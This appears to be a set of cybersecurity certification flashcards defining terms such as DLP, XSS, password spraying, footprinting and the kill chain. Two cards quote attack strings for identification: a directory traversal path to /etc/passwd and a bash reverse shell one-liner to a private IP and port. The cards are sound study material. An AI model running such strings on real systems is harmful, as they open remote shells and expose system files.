3 basic Linux permissions
JN
Read, Write, Execute
../../../../../../etc/passwd
SD
Directory traversal
Term for mapping out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace
FT
Footprinting
Windows command line version of task manager
AS
Tasklist
Which of the following are threats discovered in live environments that have no current fix or patch?
ZD
Zero day
System to configure classification, confidentiality, and privacy rules and policies, log incidents, and compile reports. Can block files from leaving network
AL
DLP Data Loss Prevention
Injects malicious code from the client browser in the context of a trusted page
FD
XSS Cross site script
Tool that uses TCP SYN to scan for host discovery with fingerprinting of active hosts
ZM
NMAP
Command to change permissions on Linux
CH
Chmod
Email authentication method that uses a digital signature to let the receiver of an email know that the message was sent and authorized by the owner of a domain.
LS
DKIM Domain Keys Identified Mail
Permission type needed in Microsoft to connect to folder on different computer
SA
Share
Access a large number of accounts with a few commonly used passwords
EW
Password spraying
Command line tool for web app vulnerabilities
MA
Nikto
Linux command used to extract text from the binary files
QA
Strings
Developed by Lockheed Martin.7 step model for identification and prevention of cyber intrusions activity.
DM
Kill Chain
State of data when encrypted on a hard disk. Data at ?
ER
Rest
What is this an example of
bash –i >& /dev/tcp/10.20.100.1/8181 0>&1
vd
Reverse shell
Tool by OWASP to identify web application vulnerabilities by proxy
GD
ZAP Zed Attack Proxy
Command to show open ports on PC
NS
Netstat
Term for collection and analysis of publicly available information appearing in print or electronic form
NR
OSINT (Open Source Intelligence)
Microsoft tool used on NTFS volumes to encrypt individual files and folders
RD
EFS Encrypted file system
The attacker tests username and password combinations against multiple online sites
CS
Credential stuffing
Term to perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata
SW
Fingerprinting
Used to interact with a web server using a command line interface.
WG
Wget or cURL
What is the minimum version that should be used for TLS
GL
1.2